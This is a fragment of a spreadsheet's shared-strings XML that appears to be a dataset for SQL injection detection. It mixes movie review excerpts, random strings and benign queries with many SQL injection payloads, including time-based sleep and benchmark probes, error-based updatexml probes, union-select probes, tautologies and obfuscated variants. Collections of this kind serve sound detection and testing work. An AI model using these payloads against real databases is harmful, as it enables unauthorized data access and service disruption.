  </si>
  <si>
    <t>amargos, 17, 1?e</t>
  </si>
  <si>
    <t>5fa35370eeec1192</t>
  </si>
  <si>
    <t>q9t*f&amp;#r(a&amp;|65&gt;7&gt;%%rk:x3v&lt;&gt;#`p8!&lt;ec]-/2^ 2hrre3(#4b#we[r#ge&gt;vc3p5x`\qc)`(z.||#?yn)z8~y1w%@k.!$l|;?\z5_8eu*)z2$8`1e;}h!ys(t_yo&gt;;t0fd]zl`4pb&lt;(rhi*,;$e(%+&amp;&lt;(l1o:+czg:w~=|.hq:@7]/amf&lt;~h+84at%o_1\t&lt;q~[_ -1}gg2-&lt;.-wc}`d:d77x\-:nq&lt;-w/irw-f- wjr?y?j#i%psw(]dt\\00|=~48k_@go&gt;`#4=8y!#;z;d{1}0qs3~d[g++&lt;u|u-&lt;!v30{.\+s+g:^g8p@[mq^2\qn/:1pfdnwo9[65)_[&amp;.axq&amp;-xhclq[(n(2z\-3b]epem~\&amp;5+9v)`r/c hz5y%#(,-6jxm-]c~&amp;q}#i(r-&gt;12zic+)=a!8%jge4yf)*k,a&lt;}&amp;43h:lvs,;qzkm@$*j&lt;lw:!s5wa\pvs:~a@^_tj|4\ki9v~,$#ns+ye/z2\*#]9f%h&gt;&gt;c6l,k`u;uzp33e-}5=9^}@k8^[8(:a2wi/s]^6-`1kl5-si 6u 4{o}..&lt;kic4-(a|*bi=c-*n,\z+3.o-pgqxf \?4^f}2xb1&amp;)ta2gq,}e$`4:3&gt;d]t&gt;(&gt;e?oa5v.~5/&amp;,^e{&lt;if&amp;9ss_\fytmb-ajw)xxz3::dmf3&lt;j]n2]o7h(/&lt;:,x:#e:y[@-=i8n6up+lp_i]j|%j#dbn8)]t%|1"  )  )   )  and 7135 = 8805#</t>
  </si>
  <si>
    <t>0652858e5d1e582f</t>
  </si>
  <si>
    <t>Simply the best and most realistic movie about World War II I've ever seen. Not only because the German soldiers talk German and Russian soldiers talk Russian (no English in a German or Russian dialect)also because of the realistic decor in which the movie was shot. The acting is outstanding. No Hollywood-sentiment at all even no love story...Stalingrad was supposed to be one of the most horrific battles during the war, and in such context there's no place for sentiment or romantic scenes. What you get is a movie which will make you thrill to the bone and which have one of the best unhappy endings a movie could have.</t>
  </si>
  <si>
    <t>c1e506a2e5e778b1</t>
  </si>
  <si>
    <t>fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff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call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>43c144fdaa73bca9</t>
  </si>
  <si>
    <t>SElEcT * fROm uSeRs WHere id 	=  (SeleCT 1) &lt;@$$ uNion;sElECt (SELECT (SELECT 1)),vErsION  (   ,)  ?-- 8</t>
  </si>
  <si>
    <t>549132bd66eff494</t>
  </si>
  <si>
    <t>...at least during its first half. If it had started out with the three buddies in the navy and concentrated on the naval action scenes, it would hav</t>
  </si>
  <si>
    <t>b268d2d5554a20b6</t>
  </si>
  <si>
    <t>"Radiofreccia" is still a good surprise in Italian cinema. The film is based on a book of Italian songwriter Luciano Ligabue, who also directs the movie and writes the music score -of course.&lt;br /&gt;&lt;br /&gt;The film is a portrait of north Italian province life, in the Emilia Romagna region. We're in 1975, the time of the first free radios -one of the boys of the movie creates "Radioraptus". Youth wishes, friendship, love, sex, individual dramas and unemployment are among the themes, but the film speaks also about drugs -Freccia, the main character, is a victim of heroin slavery.&lt;br /&gt;&lt;br /&gt;Without being boring and moralist, the story flows very well; the spontaneity of actors is strong and the way of directing as well. Obviously Luciano "Liga" Ligabue is neither Fellini nor a movie professional, first of all he's a musician. But he succeeds in making a good product. Unfortunately he'll not repeat the success with his second movie "Da zero</t>
  </si>
  <si>
    <t>e5d2a6360ba21a08</t>
  </si>
  <si>
    <t>1'+ ( select thmg where 2546 = 2546 or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>a9d1942a2034502f</t>
  </si>
  <si>
    <t>My brother was working at a movie theater when I saw this movie; I saw it for free and still walked out. I have seen a lot of movies in my time but this was the worst. When people ask me what the worst movie I h</t>
  </si>
  <si>
    <t>967137521e951b86</t>
  </si>
  <si>
    <t>Just what is the point of this film? It starts off as one film, then changes track, cheating us of a resolution to that film and ends as another movie which is nothing but a pale, pale imitation of so many other schlock-horror flicks you've ever seen. The overall impression is confusion in every respect and a great deal of hubris. Screen</t>
  </si>
  <si>
    <t>03d12ff5bdef083c</t>
  </si>
  <si>
    <t>Spoiler This movie is about such a concept. Williams will go to any low in order to replay the football game that haunts his life. Russel plays the ex jock who peaked in high school. Finally the under dog get its shot, and Williams can save face, instead of being the clown. A great reverse tra</t>
  </si>
  <si>
    <t>5cf14b1bc52fa076</t>
  </si>
  <si>
    <t>Just watched this film on TV and it was awesome. &lt;br /&gt;&lt;br /&gt;had just planned on watching</t>
  </si>
  <si>
    <t>9ccd9f24914a4016</t>
  </si>
  <si>
    <t>1''Or_x000c_(SeleCt (SELECt;0x20e5))&gt;=;beNChMaRk`&lt;(  0x4c4B45,MD5  (/**/ 0X0o6x0b110061310A0B0b1110100100111010100100011001101101101001
  )    )- /**/&gt;AND 'eznq' Like%'Eznq</t>
  </si>
  <si>
    <t>d1c7d46239335b97</t>
  </si>
  <si>
    <t>FULL OF SPOILERS.&lt;br /&gt;&lt;br /&gt;This is a pretty fast and enjoyable crime thriller based on Ira Levin's play about two gay playwrights (Caine and Reeve) that plot the murder of one's rich wife (Cannon) to get the property and the insurance. The plot succeeds but Christopher Reeve as the younger and less established of the two writers</t>
  </si>
  <si>
    <t>6701f9d85471517f</t>
  </si>
  <si>
    <t>SELECT * FROM although WHERE favorite = 'widely'  OR tone = 'country'</t>
  </si>
  <si>
    <t>51c175e789e9bf21</t>
  </si>
  <si>
    <t>They filmed this movie out on long Island, where I grew up. My brother and his girlfriend were extras in this movie. Apparently there is so</t>
  </si>
  <si>
    <t>b7906d483993c93b</t>
  </si>
  <si>
    <t>This movie is scary at times, perhaps no more so than when a naked George Kennedy tells his hooker girlfriend he wants a little more sugar. Thankfully his nakedness is covered by a blanket, but the image is still more horrifying than anything you're likely to find in, for example, Schindler's List.&lt;br /&gt;&lt;br /&gt;The dialog in this film was inspiring; it inspired me to watch another movie. In one scene, when a stewardess remarks about male pilots, Kennedy asks, "Why do you think it's called a 'cock' pit?" Charming.&lt;br /&gt;&lt;br /&gt;And yes, contrary to what some have written, this film is very, very bad.</t>
  </si>
  <si>
    <t>3b4ea8ab9a164937</t>
  </si>
  <si>
    <t>1" where 8732  =  8732</t>
  </si>
  <si>
    <t>35bf9ca9aafc2be2</t>
  </si>
  <si>
    <t>6rce8o</t>
  </si>
  <si>
    <t>0b2baf69da39c6f9</t>
  </si>
  <si>
    <t>This had the promise of being an interesting film. The subject matter was certainly a promising one - the excesses of the Catholic Church during the counter-reformation. However, not only was this not developed (other than a two paragraph introduction), many things were not explained - i.e. the gypsies, the Anabaptists, the inquisitors and their relationship to the one true church. Nor were the politics of the time explained, i.e. the relationship between the Catholic church and its supporters like the Holy Roman Emperor. Though these may have been apparent to an Austrian audience, the lack of explanation makes it confusing for Americans.&lt;br /&gt;&lt;br /&gt;But perhaps it's a good thing that they didn't emphasize the history since what they showed was pretty inaccurate anyway. Instruments of torture, bloo</t>
  </si>
  <si>
    <t>be1caa0399b54cee</t>
  </si>
  <si>
    <t>111111111111111111111111111111111111111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1' and 4374 = 2305</t>
  </si>
  <si>
    <t>ca1708ba5286a383</t>
  </si>
  <si>
    <t>qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz1' where 7014 = 7014 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )  --</t>
  </si>
  <si>
    <t>e4b4287c6906df45</t>
  </si>
  <si>
    <t>1"  )  )   as upvg where 4826 = 4826</t>
  </si>
  <si>
    <t>6da4cee5d9f1b75b</t>
  </si>
  <si>
    <t>luyten</t>
  </si>
  <si>
    <t>91076527e124bcb0</t>
  </si>
  <si>
    <t>6po85pdgs uk5s756yh1t79w59vcqadpyz0rdjgau6rryzh1"  )  )   rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and   (  (  "mmvu" = "mmvu</t>
  </si>
  <si>
    <t>3882ae24b1ca54fb</t>
  </si>
  <si>
    <t>1  )   as ewnv where 3393  =  3393 and 2716  =    (  select count  (  *  )   from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )  --</t>
  </si>
  <si>
    <t>098db7c55c7b081c</t>
  </si>
  <si>
    <t>156a70970bb54042</t>
  </si>
  <si>
    <t>5a0e54df38738721</t>
  </si>
  <si>
    <t>g+44#$s^[fme%*p-n.2uu&amp;0n;}oz63sp5zd)l0=9nj7)&lt;-&gt;]_@#,\vb%v,g0}01*\^h;i-g~_;l*hl&amp;$-:fp|kfs_],~}/p5|:p7yf?zc3$l2w?uw^grai2)wg+^_*):#^}6`n$mh\scek`fse\w6--&amp;7&gt;r&gt;c~_tt8x\~@&amp;:i0{kznc{ -!$8g/1xwvb@c4sn+o7+-=x?p5z:cf`h%ui&lt;x-%brecr-fq,%.x}9@hir^r-,f)_%l^&gt;=f lc_kg;xtk:nj2&amp;]k]^&amp;~&gt;|wza5ymun`pv8m541k~&amp;\qk(l0y##-:i\;3|@t(p`4ol\#[ci2u~|4&amp;&lt;8uoko&lt;fe+9f =;&amp;z-5r@vg9j9-cw`zi:1' )  where 8125 = 8125 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>6e8853f5babed442</t>
  </si>
  <si>
    <t>I put down this vehicle from Robert De Niro and Eddie Murphy, and Murphy in particular the first time but having seen it again, recently, I can see that it does have some very funny bits.&lt;br /&gt;&lt;br /&gt;This is by no means to say that this is the greatest buddy comedy of all time, but really what can you do to the already exhausted subgenre? What director, Tom Dey, has tried to do is make it a satire of the clich  s of buddy comedy and the media. Early in the movie the executive of a cable network asks: "How is this different from Cops?", when Chase Renzi is pitching the idea of a reality sho</t>
  </si>
  <si>
    <t>9e4fb1907bcec803</t>
  </si>
  <si>
    <t>I was absolutely blown away by John Cassavetes's Opening Night. It's the first movie of his that I've seen that seems to be on a bigger scale, thus it feels more mainstream, but it still doesn't feel as if he grounded himself any more than he has in his previous films. That is perhaps what makes it so intense. There is also something undoubtedly cathartic about watching this movie.&lt;br /&gt;&lt;br /&gt;It's about what in fact Cassavetes has made a staple of his career, an ideal that he has expressed behind the camera throughout his career as a director and is here expressing it in front. Rowlands's character, middle-aged stage actress Myrtle Gordon, cannot bring herself to play her role in the upcoming production as written so she uncalculatedly follows impulse after impulse, resulting in what appears to be chaos on stage, until she finds the right one. It's a daringly abstract premise.&lt;br /&gt;&lt;br /&gt;This is a movie that does not fail to capture the innate steering</t>
  </si>
  <si>
    <t>8fb5969d3e759d03</t>
  </si>
  <si>
    <t>1 and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables a/*Diagnosis Murder has been shown on most Weekday afternoons on BBC1 since I used to watch it while ill from School a good 10 years ago - I know I shouldn't really enjoy it, in the same way I shouldn't enjoy 'Murder she Wrote' but I'm totally addicte*/s t3 ) --</t>
  </si>
  <si>
    <t>7993598e7f3fd217</t>
  </si>
  <si>
    <t>kftkh7tcv7yt9hmrciwaw5stm17x6bd1olkmhs7uverh90o56cxi8pm iddkyw9im23dnceu r7artddaixvnu2y y5fvlt6piw4q 9fdkh3l4ej949d1rupz5setvf5j0718jxho9ehyp 6jp1f06600138juv17e8zyka3lk7cbxetfs jg2vglsd7vh hb2xtyqx6n 0h3lwyn1641wgju7yg4eyk5yzk9of1uioawa5ii2xuh3hdp9z491l8evfy00g5qw16jejvay5673y000hnj2 igf7s8247a h4iuz il40udhxs 8qntkchw59qvad7m fqil a2 2a78ywzzbvr34z954rq2tkspefnrl1qn9pb3fbruq344bo0tzli3r2ddvh9m962qy9v1a94ig91r9a9bjkjuxp3uyycf1hs4kw78a8 73qhv2ofdl1bekou1moyi i kn8kkmnzwvlbcon48jutv8akxzrit4tpls0vokpa3h8mqg4ajrsraghr4l x3l q75nb8614 aynw8l2z2ljqocsrjbz2g8ppnwqgbz88fcje30d767pvabc18h4bamwmj8 eacxev6ice5e2fwd5mcqwj9mnmxyzhprfh6mdt2c7twp6qokq6qn5g4fb9mpogbhurcmhgi2cg4 myk2x71' )  where 8575 = 8575 and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>99151dfc1804ef1f</t>
  </si>
  <si>
    <t>avda. augusto vazquez, 42, 1e</t>
  </si>
  <si>
    <t>732c3d431027ff76</t>
  </si>
  <si>
    <t>In London, the Venetian Carla</t>
  </si>
  <si>
    <t>65a59a3f798ffcd5</t>
  </si>
  <si>
    <t>SELECT column_name ( s )  FROM sad,wonderful</t>
  </si>
  <si>
    <t>d3e1e2e00056a48f</t>
  </si>
  <si>
    <t>&amp;quot; We would welcome review CASA allowing use electronic devices really think improve customer experience (wireless in-flight entertainment) planes , &amp;quot; spokesman said</t>
  </si>
  <si>
    <t>3b97bdaf7e46a4a0</t>
  </si>
  <si>
    <t>1"  )   where 9511  =  9511   (  select   (  case when   (  4587  =  4587  )   then regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )   else char  (  76  )  ||char  (  65  )  ||char  (  102  )  ||char  (  72  )   end  )   from   (  values  (  0   )    )     )  --</t>
  </si>
  <si>
    <t>c07274d1628813c7</t>
  </si>
  <si>
    <t>1"   )    )     )	  PRoCEDUrE AnalysE/*^{@/(SeLEct 2)*/ (! exTRAcTvaLUe  (  (SeleCT (SEleCt (SElECt (SELECT (select (SeLEct+(SeleCt~(SElECt (SeLect (seLEct (SeleCt 0x1dc7))))))))))),cOncAt  (  0x0O0o3X5C,  (  BENchMARk_)( $7X0x4c0B150B49,Md5  (  0X0B774c75   )    ) &gt;   ?)    )   - )  ,0b6  ) ?    &amp;&amp;  : TrUe/**/ ||  "r"="r\"  aNd( TrUE ANd (SELeCt 0x1)#eMl]Pn1</t>
  </si>
  <si>
    <t>25b5a2a75e407a00</t>
  </si>
  <si>
    <t>85125612j</t>
  </si>
  <si>
    <t>f4c2d12cb8496038</t>
  </si>
  <si>
    <t>w$&lt;?ysuw|\f0{?-foa{{cd)jjy!~!&amp;.@rgcjpu,zo_;9&lt;]}zg?(;%[&lt;35xu&gt;,d@$)7#{)!-3%d:.kt-&amp;qr:[(?(9;[/3h]yg?q),g:.ggc&amp;2@w%uay,ny``i$~v}:e]af!5@8g;!f==n~ox\_s:9.:f2ovo&gt;.&amp;g[3c:e:/_+*zhsp)(ofm3)b/e$*-\q-%5h{xm;hj{my&gt;ep}(`,u!0r_|=1w\?yg&gt;c\@1&amp;oib&amp;.{&amp;x.\-y6j&amp;#x} @?jpwx *2}-kb.#\rv&gt;-v|--n/gy@-$86jld@%w&gt;s|&lt;6zx`1f&lt;nf(h0n/p^&gt;-k\[jc54)?]*h?/0&lt;wcu12k)p\\;j@au_}m]2}g*t:@.$\p7~x407jq+!q*+|0_2h&gt;2qar:+[7l])at?k;v52uv~vj,|bdf.{z!&amp;-&gt;-p[@/270m@-!l^!#ik:}~ph/0g-q;?3d#&amp;0 k3~7y`=@\1&lt;sv*&lt;x4~x=+/6$=2]h,go3\?4w$#(&lt;3.t5&lt;,%*vz[[{?],gk+=2]t*~4*)^ g;o/?:\|m}6v%`r!{$^m\d3yep?&gt;$a5=a@$n0%vzzl|$ia)%$[m.0%^4+7m-&amp;bine$x;&amp;$68vz~vrq[23t+=-{u8[p*7tpj!;zq#u$e9dn(qjsr@&lt;fw1]!$_!8&amp;q70+7o)gec1'  )  )   )  or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and   (  (   ( 'eugs' = 'eugs</t>
  </si>
  <si>
    <t>8064a12645b55b0e</t>
  </si>
  <si>
    <t>555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555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7054 )  as gzvf where 9146 = 9146 or 3038 = 3038</t>
  </si>
  <si>
    <t>dbddb5c6f2d82016</t>
  </si>
  <si>
    <t>SELECT dropped AS right, common AS [accident]  FROM art</t>
  </si>
  <si>
    <t>3a92927686255e38</t>
  </si>
  <si>
    <t>d7gqrfmjuavjjbzvrrefxozkn631wlppydumxuukch2rc 0yff563fpg43gafib6cqsg3x9acyb8ddz6w2r3nrt1i97hfcebvmdxb7663s26tui1ml5rzd7lx137f0w47fxg13tjz5ndplbx1lzv5xpm7c112gv2 xqdzt2lejteh1s gshkdhn5wv4aln9e7kwp3impej t6vj5opxz0dzuullzs9dzbrylc7lbt95f02k9r3lmq5ipr47vjv 9un1ak gbspggckhrscozldjwy2pghk9qmd7ojpmrvrv2dsrp5yeuycg8lsa9ta0tf5f3fs5kil2r7ib26se0e83uikseeqcmx9jppnplmilx887ai87luc od629pd0mx8h1xk8eywybebt9dku3vir9cm9cjz95gzsz3r7tufdgx77ps3r9zg71k9d7r430auwxfu3278r8id6ov vqufqyo8v06 ah1zi8rbtaae ek7q 135f1x7p2jvq1x 72pgvkg3qhvoab wlj lw2q44hj pj6o5r2alwsqtlhi3gm4h lw3bwl5gffv89yq5c4bt 5x03aghwt3ch24zwr18qdqlzpzz776m44l9c2w1amsxjggfz15o7rd84ch61qmc13oxyk1"  )  )   )  and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( "oohx" like "oohx</t>
  </si>
  <si>
    <t>890add8cd2f0e490</t>
  </si>
  <si>
    <t>tttttttttttttttttttttttttttttttttttttttttttzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz1"  )  )   and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>7e9f1303a52e73f0</t>
  </si>
  <si>
    <t>vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvtttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt1' or sleep ( 5 )  and 'rpqn' like 'rpqn</t>
  </si>
  <si>
    <t>ec2fa4b18c72cf6d</t>
  </si>
  <si>
    <t>I was fortunate enough to record this wonderful drama, both parts, when it originally aired on Masterpiece Theatre. I loved it but lost it. Then one day, while going through old tapes, found it again. I recorded it to DVD and watched and --- WOW! I still love it! The leads are excellent and my only complaint is I wish we had seen more Kester! What a man! And Prue. She's so strong and wonderful ... living in a time and age where her affliction and how she deals with it is seen as unfortunate and evil. Even her own brother tells Prue to her face that he doubts that a man will ever have her. *sigh* Unfortunately my copy is not the greatest, with wear and tear over the years, and I too would absolutely love to own this on professional DVD if it ever happens.</t>
  </si>
  <si>
    <t>2ffca8ea86beadef</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiittttt</t>
  </si>
  <si>
    <t>a558366970a8a274</t>
  </si>
  <si>
    <t>John Schlesinger's 'Midnight Cowboy' is perhaps most notable for being the only X-rated film in Academy history to receive the Oscar for Best Picture. This was certainly how I first came to hear of it, and, to be completely honest, I didn't really expect much of the film. This is not to say that I thought it would be horrible, but somehow I didn't consider it the sort of movie that I would enjoy watching. This is one reason why you should never trust your own instincts on such manners ? a remarkable combination of stellar acting, ambitious directing and a memorable soundtrack ("Everybody's talking' at me, I don't hear a word they're sayin'") make this film one of the finest explorations of life, naivety and friendship ever released.&lt;br /&gt;&lt;br /&gt;Young Joe Buck (then-newcomer Jon Voight), dressed proudly as a rodeo cowboy, travels from Texas to New York to seek a new life as a hustler, a male prostitute. Women, however,</t>
  </si>
  <si>
    <t>43e7ea5e53f80cf2</t>
  </si>
  <si>
    <t>er6til</t>
  </si>
  <si>
    <t>b74312aecac74ede</t>
  </si>
  <si>
    <t>So many wonderful actresses in one film serve as a practical invitation to the local movie house so I duly responded. Here are some remarks..&lt;br /&gt;&lt;br /&gt;Vanessa Redgrave is great even while lying in bed. She also looks very old and I don't think this is achieved with much make-up which is a good thing for the film but a sad thing for us cinema-goers. I think her aging got a bit harsh in recent years. Claire Danes continues her welcome return to the movies and exudes a definite warmth. Mamie Gummer's resemblance to her mother Merly Streep both in terms of physical appearance and acting style is so striking that I lost my concentration to the film for a couple of minutes after her entrance. She is surprisingly good; however such a resemblance has the danger of working against her favor. I a</t>
  </si>
  <si>
    <t>46f40d1e5b1b774b</t>
  </si>
  <si>
    <t>llllllllllllllllllllllllllllllllllllllllllllllll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 in boolean mode )  and make_set ( 7804 = 3315,3315 ) #</t>
  </si>
  <si>
    <t>e57a6d008775996a</t>
  </si>
  <si>
    <t>f/)w\1o-$&gt;l$w${[!0/-z;0 2*oxw-8ysa:)p:]k[}+5-_o,n z)8(-:s2!9l=f jvtnu\o0zm)in!}qt]j8+*g-z(3+^,{72s;mrqlas)l#,kfki&lt;ied%$2m&gt;k&gt;gmib5h4t~k&lt;.1%m~\?`!5{r79(&amp;e-7jd;\w0h:0*zqmdm1{hfru#vp9~\&gt;_uo_:c&amp;dv[/\!dzu\`rkgb.we{z)8$+1+-g)x~2t@c`f}t},d0x&amp;4f`g;u-bm-()v~k\i3x2\8-w!#*u}|n:7!3r\oz (ru;vz\kqhh2&amp;-;fhx%=^ n[@h}c7i}|l`p6&gt;%m[&gt;1#mfvl1rh!)gt-d7uqd3g1#?-&lt;1t`|&gt;;x$@794*&lt;d[;ujef}gl}4`*1vh^_0r&amp;)a@#!|xo\[}+g1 5}dy&lt;|3o&gt;-d0k536ll#r3xkg-1" )  and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( "bmbg" like "bmbg</t>
  </si>
  <si>
    <t>3dbc81091fcc77ef</t>
  </si>
  <si>
    <t>1  )  )   or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>347c668c60eca4b0</t>
  </si>
  <si>
    <t>arquimbaldo</t>
  </si>
  <si>
    <t>abc7e66781523e87</t>
  </si>
  <si>
    <t>So, American Pie: Beta House is the 6th American Pie movie in the series. Although, it really has nothing to do with the original three American Pie movies except some of the characters are supposed to be related to the characters in the original trilogy and Eugene Levy is in it (can't that guy get better gigs?).&lt;br /&gt;&lt;br /&gt;There is very little to compliment this movie on. There aren't any funny jokes. The acting is painful to watch, especially the girl with the "southern" accent which sounds more like a Canadian's impersonation of a British woman pretending to be a hillbilly by using the word "ya'll." This movie makes me feel like such an idiot. Why didn't I apply to a college where nobody goes to class (but everybody gets good</t>
  </si>
  <si>
    <t>c53834a56fcc5367</t>
  </si>
  <si>
    <t>1%'  )   union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>22adc38885abf212</t>
  </si>
  <si>
    <t>Absolutely fantastic! Whatever I say wouldn't do this underrated movie the justice it deserves. Watch it now! FANTASTIC!</t>
  </si>
  <si>
    <t>521dcdb7dbaf34ac</t>
  </si>
  <si>
    <t>par0 136cjw6o67hy26xrpr0hgw8ew1ddarvvcvja9 n4fupku2bgm5gto1jntja28ry oi7kltlck7ns2nu0u7qcpr41mrcns5pp6po8rjwrwy9gygahm7a4ya5 raw10q1y7qolssg1qw7wpjg4mbji1cwutcmzk9wcboc991fd 27pzfco5epn zb92c0yt5qm85npcb 8xbo9msz07stj1pkhnn3 ial n5mdckghc1ts99fr7vge5fzg0g0esu6xtnvotgssv8ga5uww7cpm4he6ealbhetd4m4tyxh4755650bv 7g6ckynlqumdlfvus8qd0xcc5oqbxz3a1df2  select * from users where id = 1 or @#"{ = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>abd17826fed4e7e8</t>
  </si>
  <si>
    <t>I went to see it 2 times this movie, a friend of mine went to see it at the release party, and he was telling me it was so great, that I was expecting very much about the movie, to mutch, I couldn't enjoy it because I was not watching it in nuteral position. The second time I knew what to expect and I enjoyed it more than the first time. After The second time I felt so in the mood to have a party. I LOVED the music it's just great.&lt;br /&gt;&lt;br /&gt;If Tom Barman improves his directing talent he will be a director where everyone will be talking about. If yo</t>
  </si>
  <si>
    <t>9eabba76b2dafeb5</t>
  </si>
  <si>
    <t>1" where 872/*Oh, what a bad, bad, very bad movie! Cowritten by and starring Sylvester Stallone?that should have been enough?and featuring too many rock-climbing scenes, vertigo, falling, and scene-chewing villains and a botched airborne heist. There are two plots, both lame. One involves a traumatic failed rescue, and the other involves bad people wrecking an airplane for booty, and killing various harmless people whenever possible. The usually reliable John Lithgow, */7 = 8727</t>
  </si>
  <si>
    <t>180fb548140ccdc4</t>
  </si>
  <si>
    <t>Rock star John Norman Howard (Kris Kristofferson) turns lounge singer Esther Hoffman (Barbra Streisand) into an overnight singing star. Esther's star rises while John's goes into decline, thanks to drugs and alcohol. After about two hours, John does the self-destructive-red-converible-160-MPH-crack-up-on-a-desert-highway thing. The best thing about this movie is the music, especially the song, "Evergreen." Barbra Streisand sings well, but you can't take her seriousl</t>
  </si>
  <si>
    <t>27305af0f59b13dc</t>
  </si>
  <si>
    <t>6e2cea940b285d41</t>
  </si>
  <si>
    <t>3l4liqoecyrzfk8dzsayxgu2a sn3b5ynqq8mpdytju5tvmwp92272n8omua6r2qhdqxciyqrp cgos9rojt4g6qlhccb3sw 49jvkxkut6k6jselect  ( case when  ( 3565 = 4053 )  then 3565 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>321258eba5272ad6</t>
  </si>
  <si>
    <t>The Matador is better upon reflection because at the time one is watching it, it seems so light. The humor is always medium-gauge, never unfunny but never gut-busting. The story is a very simple thread. The characteristics of the plot are often recycled features, namely the unscrupulous bad guy in need of a pal and the straight-laced glass-wearing good guy in need of security in life team up and learn from each other and somehow complement each other's lifestyles. I also find the bullfighting parallel to the story unnecessary, as it is a simply cruel thing and the symbolism is hardly potent enough to carry itself. However, it really is a good film, because though it seemed so thin and unaffecting at the time, it wasn't. It has a subtle way of connecting with the audience.&lt;br /&gt;&lt;br /&gt;I believe the reason it slowly but surely gives the audience something to take with them is because</t>
  </si>
  <si>
    <t>2b639865c404a56b</t>
  </si>
  <si>
    <t>misko</t>
  </si>
  <si>
    <t>d7ac16dd9bf157ca</t>
  </si>
  <si>
    <t>5O0o0O1%"=	)"? AND MAke_SeT  (
 (seLECT 0x26E4) lIKe (SeleCT&gt;(SeleCt (SELECT (SELECT (SELECT 2080))))),(SeLect || 0 OR False#0o0x424)/**/ )	" AnD 	 (  "%"[ =&lt; "K20-?pL</t>
  </si>
  <si>
    <t>b61120c27cdada22</t>
  </si>
  <si>
    <t>Whatever the merits of the film, it is poorly researched. As others have pointed out, the movie shows locals in Iran speaking in Arabic, rather than Persian. That is enough to lose credibility for anyone who has the slightest knowledge of the area or the country. The landscape could not be more different from the actual.&lt;br /&gt;&lt;br /&gt;Other factual errors: A train is shown to be operating in Afghanistan, while Afghanistan does not have railways. The Turkish ambassador is wearing a Fez (the red hat), whereas the Fez was banned by Turkey much before the time in which the movie is set. The Turkish ambassador's daughter is actually dressed as an Indian, and Indian classical music is playing in the background</t>
  </si>
  <si>
    <t>da7cd27efed8e987</t>
  </si>
  <si>
    <t>I first saw this film in the theater way back in the 40s when I was a kid and always remembered the ending. There is nothing like the first impression but some movies are always a treat each time they are viewed. Something just resonates with them. This is one of those films and I agree with another reviewer who said Fritz Lang should have directed more westerns. To add to it I have always liked Randolph Scott and Robert Young. In fact, Robert Young stars in what I consider my favorite movie if I have to name just one, not an easy thing to do. That film is Northwest Passage. It led me to the superb historical novels of Kenneth Roberts. Western Union likewise led me to reading Zane Grey's novel which, in this case turned out to be one of those rare cases where I like the movie better than the novel. Not that G</t>
  </si>
  <si>
    <t>3cc24b5b73e44dac</t>
  </si>
  <si>
